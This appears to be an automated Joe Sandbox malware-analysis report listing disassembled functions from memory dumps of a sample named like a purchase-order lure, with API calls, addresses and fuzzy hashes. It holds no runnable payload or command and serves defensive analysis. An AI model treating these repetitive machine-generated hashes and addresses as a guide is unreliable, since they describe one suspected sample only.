                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$MoveWindow
                                                                                                              • String ID: Listbox
                                                                                                              • API String ID: 3315199576-2633736733
                                                                                                              • Opcode ID: 0a02fd637e55aebfd1686950b0404e1271f584559992f67f69a6289789d9af30
                                                                                                              • Instruction ID: 804695106d9072d668b4a11893ee338a144937dfb103b58959e3fe762dc4c502
                                                                                                              • Opcode Fuzzy Hash: 0a02fd637e55aebfd1686950b0404e1271f584559992f67f69a6289789d9af30
                                                                                                              • Instruction Fuzzy Hash: 3B21D772610118BFEF118F54CC85FBF3BAAFF89760F01812AF9449B2A0C6759C1297A4
                                                                                                              Function 0044A409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0044A46D
                                                                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0044A482
                                                                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0044A48F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend
                                                                                                              • String ID: msctls_trackbar32
                                                                                                              • API String ID: 3850602802-1010561917
                                                                                                              • Opcode ID: 60291ca71ce6b9c2c1836d8e7d9af16d162b04062b892488a8cb0d2eafc41603
                                                                                                              • Instruction ID: 35fc5d0f44391bb8a0017310974599730f0ee07670296bd11ec9390763d6f922
                                                                                                              • Opcode Fuzzy Hash: 60291ca71ce6b9c2c1836d8e7d9af16d162b04062b892488a8cb0d2eafc41603
                                                                                                              • Instruction Fuzzy Hash: 4A11E771240208BEEF209F65CC49FAB3B69FF89758F014129FA4596191D2B6E821C728
                                                                                                              Function 00402287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00402350,?), ref: 004022A1
                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004022A8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                              • String ID: RoInitialize$combase.dll
                                                                                                              • API String ID: 2574300362-340411864
                                                                                                              • Opcode ID: 76cb073e571d5423b819b8706329af99d8ab900f2dd9170fb26f0a2bb705fce5
                                                                                                              • Instruction ID: 7445139b4f5e9cc01a8700a53d7ee6801a6f783474cf80e86742a58ee2e0dea8
                                                                                                              • Opcode Fuzzy Hash: 76cb073e571d5423b819b8706329af99d8ab900f2dd9170fb26f0a2bb705fce5
                                                                                                              • Instruction Fuzzy Hash: 14E01A74F94300ABDB905FB1ED4DB953A64A712706F104075F142E51E0EBFA4051DF0E
                                                                                                              Function 0040235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00402276), ref: 00402376
                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040237D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                              • String ID: RoUninitialize$combase.dll
                                                                                                              • API String ID: 2574300362-2819208100
                                                                                                              • Opcode ID: fc8620c476dea1808241e074cc86de8450c906fca92a4d4347f60a36990aa23e
                                                                                                              • Instruction ID: 158732add5f8b9ed930b363021dd0a5847684991eaa3213f8acad284fc576e62
                                                                                                              • Opcode Fuzzy Hash: fc8620c476dea1808241e074cc86de8450c906fca92a4d4347f60a36990aa23e
                                                                                                              • Instruction Fuzzy Hash: 98E0B6B0F44300ABDB205F61ED0DB553A64B715706F100436F50AE21F4DBFE5410CA1E
                                                                                                              Function 0045AC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LocalTime__swprintf
                                                                                                              • String ID: %.3d$WIN_XPe
                                                                                                              • API String ID: 2070861257-2409531811
                                                                                                              • Opcode ID: 75b30d07304d0613231f02e1816d7415811168480f0d4445ad47b640cef88428
                                                                                                              • Instruction ID: dbb4c815a9c9a92aabe9b3e2ebb710d2b8f62443fe140912a0b91f7665fc1753
                                                                                                              • Opcode Fuzzy Hash: 75b30d07304d0613231f02e1816d7415811168480f0d4445ad47b640cef88428
                                                                                                              • Instruction Fuzzy Hash: 1DE0EC7180461CABCB129790CD05DFA737CA704742F5001E3FD06A2011E6399BAAAA2B
                                                                                                              Function 00442205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,004421FB,?,004423EF), ref: 00442213
                                                                                                              • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00442225
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                              • String ID: GetProcessId$kernel32.dll
                                                                                                              • API String ID: 2574300362-399901964
                                                                                                              • Opcode ID: eb4f0cadf44e856a14a012d6e1d72750ecd6b3ec567290406e6640f7d215dee3
                                                                                                              • Instruction ID: c20f58c4b0cc9af09f71009011f21cfd907e4f07f2f94d714e54e562955d6613
                                                                                                              • Opcode Fuzzy Hash: eb4f0cadf44e856a14a012d6e1d72750ecd6b3ec567290406e6640f7d215dee3
                                                                                                              • Instruction Fuzzy Hash: 33D0A734D00712AFDB214F71F908B42BBD4FB0A314B10487BF841E2254E7F8D880C668
                                                                                                              Function 003E42F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,003E42EC,?,003E42AA,?), ref: 003E4304
                                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 003E4316
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                              • API String ID: 2574300362-1355242751
                                                                                                              • Opcode ID: 15a3ffee7508082cad7671d8e63a4ba35285d9b2dd98aa53705cd3c2118af573
                                                                                                              • Instruction ID: ec4a4fc7b5024b8b9d794258067b3187cc6e4c49d78700873827bc9f7b8705a5
                                                                                                              • Opcode Fuzzy Hash: 15a3ffee7508082cad7671d8e63a4ba35285d9b2dd98aa53705cd3c2118af573
                                                                                                              • Instruction Fuzzy Hash: 36D0A778D00722AFCB214F22E80C7417AD4AB09301B11453AE441D22A8E7F4C8808614
                                                                                                              Function 003E434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,003E41BB,003E4341,?,003E422F,?,003E41BB,?,?,?,?,003E39FE,?,00000001), ref: 003E4359
                                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 003E436B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                              • API String ID: 2574300362-3689287502
                                                                                                              • Opcode ID: e96f7ef067b94ab58332827ab3a0c21286373cb19912864949a63e71c2d8c4c9
                                                                                                              • Instruction ID: 0cc1300358bc640825172051075735f3cea3f27a6b22af928ccec8b987444855
                                                                                                              • Opcode Fuzzy Hash: e96f7ef067b94ab58332827ab3a0c21286373cb19912864949a63e71c2d8c4c9
                                                                                                              • Instruction Fuzzy Hash: 9FD0A774D00722AFCB214F33E80C7427AD4AB15715B11463AE481D2194E7F4D8808A14
                                                                                                              Function 00420564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0042052F,?,004206D7), ref: 00420572
                                                                                                              • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00420584
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                              • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                              • API String ID: 2574300362-1587604923
                                                                                                              • Opcode ID: d2bc6f7a80a8b5e6084fa86cf24a78b90cc6417a2fb2a4843ad264b8a317d48f
                                                                                                              • Instruction ID: 7671a328295e135466a7850d4939d4f524393c71bef21a9a64651cbad6da2e9b
                                                                                                              • Opcode Fuzzy Hash: d2bc6f7a80a8b5e6084fa86cf24a78b90cc6417a2fb2a4843ad264b8a317d48f
                                                                                                              • Instruction Fuzzy Hash: 0DD09E71A04722AEDB209F65A808B427BE8AF05711B60893BE85592259E7F8D4C08A69
                                                                                                              Function 00420539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LoadLibraryA.KERNEL32(oleaut32.dll,?,0042051D,?,004205FE), ref: 00420547
                                                                                                              • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00420559
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                              • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                              • API String ID: 2574300362-1071820185
                                                                                                              • Opcode ID: 5cd520f9fedd22ae5546564b08f95cd7331b6094dcabeff6a11b20effd9d3ce2
                                                                                                              • Instruction ID: 96013d57af8246dcb9f6dc06911f648092c8ba0c58b60656b90689a501749208
                                                                                                              • Opcode Fuzzy Hash: 5cd520f9fedd22ae5546564b08f95cd7331b6094dcabeff6a11b20effd9d3ce2
                                                                                                              • Instruction Fuzzy Hash: 2BD0A730E00732BFCB20CF21F8087427AE4AB01301B60C43FE446D2259E6F8C8C08A58
                                                                                                              Function 0043ECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,0043ECBE,?,0043EBBB), ref: 0043ECD6
                                                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043ECE8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                              • API String ID: 2574300362-1816364905
                                                                                                              • Opcode ID: 896bf877b80a5af13a720c621ddea0f9a14709f2fa1803afe29625f0ea62e3ca
                                                                                                              • Instruction ID: 1bfc8e95e199c5605a6cf4d476f474b08995185f34b51f330e2019de5e55d41c
                                                                                                              • Opcode Fuzzy Hash: 896bf877b80a5af13a720c621ddea0f9a14709f2fa1803afe29625f0ea62e3ca
                                                                                                              • Instruction Fuzzy Hash: D2D0A730D00723AFCF205F62E8487477AE4AB05700F10943BF846D2294EBF8C8818718
                                                                                                              Function 0043BADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0043BAD3,00000001,0043B6EE,?,0047DC00), ref: 0043BAEB
                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0043BAFD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                              • API String ID: 2574300362-199464113
                                                                                                              • Opcode ID: 42dfe07f43af1abb9a3c23fb92ab4e93fc447ab3295cb4ba120c878933b77d7b
                                                                                                              • Instruction ID: 07ea9243811b6db953a9f503f9bda922a02c88ba5a0576bd969371a2a5051683
                                                                                                              • Opcode Fuzzy Hash: 42dfe07f43af1abb9a3c23fb92ab4e93fc447ab3295cb4ba120c878933b77d7b
                                                                                                              • Instruction Fuzzy Hash: 9BD0A730D00B129FCF309F21E848B52BAD4EB05300F10443BE943D2658EBF8D880C65D
                                                                                                              Function 00443BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,00443BD1,?,00443E06), ref: 00443BE9
                                                                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00443BFB
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                              • API String ID: 2574300362-4033151799
                                                                                                              • Opcode ID: 15748133c068ca541eb8e2d6411252f88b3d8fcc61e579ae220ec1312970adfc
                                                                                                              • Instruction ID: 82530be90f40989755ec5a1188e5169a0a0f963580d8a8419335eee984c64844
                                                                                                              • Opcode Fuzzy Hash: 15748133c068ca541eb8e2d6411252f88b3d8fcc61e579ae220ec1312970adfc
                                                                                                              • Instruction Fuzzy Hash: F8D0A7B1D007129FDB205FE1E848B43BEF8AB02715B30443BE445E2250E6FCC8808E18
                                                                                                              Function 00419B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1da90898e4daaba029426aa61710d3f501642fcb09fb018d07f7a6cb13965381
                                                                                                              • Instruction ID: e7d0c22b4c830d7fc6764eb16f1cb3f3c7518758e1b619bfec240e67851675de
                                                                                                              • Opcode Fuzzy Hash: 1da90898e4daaba029426aa61710d3f501642fcb09fb018d07f7a6cb13965381
                                                                                                              • Instruction Fuzzy Hash: 1CC16D75A0021AEFCB14CF94C894AEEB7B5FF48704F104599E905EB291D734EE81DB94
                                                                                                              Function 0043AA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CoInitialize.OLE32(00000000), ref: 0043AAB4
                                                                                                              • CoUninitialize.OLE32 ref: 0043AABF
                                                                                                                • Part of subcall function 00420213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0042027B
                                                                                                              • VariantInit.OLEAUT32(?), ref: 0043AACA
                                                                                                              • VariantClear.OLEAUT32(?), ref: 0043AD9D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                              • String ID:
                                                                                                              • API String ID: 780911581-0
                                                                                                              • Opcode ID: 9df8024ae7387b432b5119db287d8893109c828210897e13af268875b3aaa660
                                                                                                              • Instruction ID: 945e8cf8ecb497035a3d0f1426a40d91e193d9aee36d0175d949d9e14023f5da
                                                                                                              • Opcode Fuzzy Hash: 9df8024ae7387b432b5119db287d8893109c828210897e13af268875b3aaa660
                                                                                                              • Instruction Fuzzy Hash: 71A158356447119FCB11EF15C481B2AB7E5BF88710F14854AFA9A9B3A2CB34FD05CB8A
                                                                                                              Function 004191CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
